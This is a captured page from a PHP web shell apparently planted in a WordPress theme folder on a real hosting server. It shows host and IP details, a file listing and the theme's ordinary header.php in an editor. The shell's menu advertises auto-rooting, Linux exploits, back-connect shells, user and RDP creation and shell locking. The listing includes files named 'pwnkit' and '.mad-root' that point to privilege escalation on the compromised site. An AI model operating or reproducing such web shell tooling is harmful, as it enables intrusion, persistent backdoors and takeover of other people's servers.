Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
1.12
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
2.97
KB
-rw-r--r--
author-bio.php
1.75
KB
-rw-r--r--
comments.php
2.58
KB
-rw-r--r--
content-large.php
2.33
KB
-rw-r--r--
content-none.php
1.04
KB
-rw-r--r--
content-page.php
877
B
-rw-r--r--
content-project.php
823
B
-rw-r--r--
content-search.php
1.94
KB
-rw-r--r--
content-single.php
2.33
KB
-rw-r--r--
content.php
2.53
KB
-rw-r--r--
footer.php
1.05
KB
-rw-r--r--
functions.php
14.26
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
home.php
1.14
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
license.txt
14.69
KB
-rw-r--r--
page.php
849
B
-rw-r--r--
page_employees.php
2.66
KB
-rw-r--r--
page_front-page.php
391
B
-rw-r--r--
page_fullwidth.php
600
B
-rw-r--r--
page_services.php
1.49
KB
-rw-r--r--
page_testimonials.php
1.58
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.17
KB
-rw-r--r--
screenshot.png
528.3
KB
-rw-r--r--
search.php
1.02
KB
-rw-r--r--
searchform.php
673
B
-rw-r--r--
sidebar-footer.php
728
B
-rw-r--r--
sidebar.php
274
B
-rw-r--r--
single.php
940
B
-rw-r--r--
style.css
41.64
KB
-rw-r--r--
styles.php
22.7
KB
-rw-r--r--
wpml-config.xml
313
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme. * * Displays all of the <head> section and everything up till <div id="content"> * * @package Moesia */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#content"><?php _e( 'Skip to content', 'moesia' ); ?></a> <?php //Single page header image data $himage = get_post_meta( get_the_ID(), 'wpcf-header-image', true ); $htitle = get_post_meta( get_the_ID(), 'wpcf-header-title', true ); $hlogo = get_post_meta( get_the_ID(), 'wpcf-header-logo', true ); $htext = get_post_meta( get_the_ID(), 'wpcf-header-text', true ); $hbutton = get_post_meta( get_the_ID(), 'wpcf-header-button-title', true ); $hlink = get_post_meta( get_the_ID(), 'wpcf-header-button-link', true ); ?> <?php tha_header_before(); ?> <?php if ( get_header_image() && $himage == '' ) : ?> <?php if ( get_theme_mod('moesia_banner') == 1 && !is_front_page() ) : ?> <header id="masthead" class="site-header" role="banner"> <?php tha_header_top(); ?> <?php else : ?> <header id="masthead" class="site-header has-banner" role="banner"> <?php tha_header_top(); ?> <?php if ( get_theme_mod('mobile_header') ) : ?> <img class="header-image" src="<?php echo esc_url( get_theme_mod('mobile_header') ); ?>"> <?php else : ?> <img class="header-image" src="<?php echo esc_url(get_header_image()); ?>"> <?php endif; ?> <?php endif; ?> <?php if ( (get_theme_mod('moesia_banner') == 1 && is_front_page()) || (get_theme_mod('moesia_banner') != 1)) : ?> <?php if ( get_theme_mod('header_overlay') != 1 ) : ?> <div class="overlay"></div> <?php endif; ?> <div class="welcome-info"> <?php if ( get_theme_mod('header_logo') ) : ?> <img class="welcome-logo wow bounceInDown" src="<?php echo esc_url(get_theme_mod('header_logo')); ?>" /> <?php elseif ( get_theme_mod('header_title') ) : ?> <div class="welcome-title wow bounceInDown"><?php echo esc_html(get_theme_mod('header_title')); ?></div> <?php endif; ?> <?php if ( get_theme_mod('header_desc') ) : ?> <div class="welcome-desc wow bounceInRight" data-wow-delay="0.2s"><?php echo esc_html(get_theme_mod('header_desc')); ?></div> <?php endif; ?> <?php if (get_theme_mod('header_btn_text') && get_theme_mod('header_btn_link')) : ?> <a href="<?php echo esc_url(get_theme_mod('header_btn_link')); ?>" class="welcome-button wow bounceInUp" data-wow-delay="0.3s"><?php echo esc_html(get_theme_mod('header_btn_text')); ?></a> <?php endif; ?> </div> <?php endif; ?> <?php tha_header_bottom(); ?> </header><!-- #masthead --> <?php elseif ( $himage != '' ) : ?> <header id="masthead" class="site-header has-banner" role="banner"> <?php tha_header_top(); ?> <img class="header-image" src="<?php echo esc_url($himage); ?>"> <div class="welcome-info"> <?php if ( $hlogo ) : ?> <img class="welcome-logo wow bounceInDown" src="<?php echo esc_url($hlogo); ?>" /> <?php elseif ( $htitle ) : ?> <div class="welcome-title wow bounceInDown"><?php echo esc_html($htitle); ?></div> <?php endif; ?> <?php if ( $htext ) : ?> <div class="welcome-desc wow bounceInRight" data-wow-delay="0.2s"><?php echo esc_html($htext); ?></div> <?php endif; ?> <?php if ($hbutton && $hlink) : ?> <a href="<?php echo esc_url($hlink); ?>" class="welcome-button wow bounceInUp" data-wow-delay="0.3s"><?php echo esc_html($hbutton); ?></a> <?php endif; ?> </div> <?php tha_header_bottom(); ?> </header><!-- #masthead --> <?php endif; ?> <?php tha_header_after(); ?> <?php if ( !is_page_template('page_front-page.php') || ( 'posts' == get_option( 'show_on_front' ) ) ) : ?> <?php $container = "container"; ?> <?php else : ?> <?php $container = ""; ?> <?php endif; ?> <?php tha_content_before(); ?> <div id="content" class="site-content clearfix <?php echo $container; ?>"> <?php tha_content_top(); ?>
Close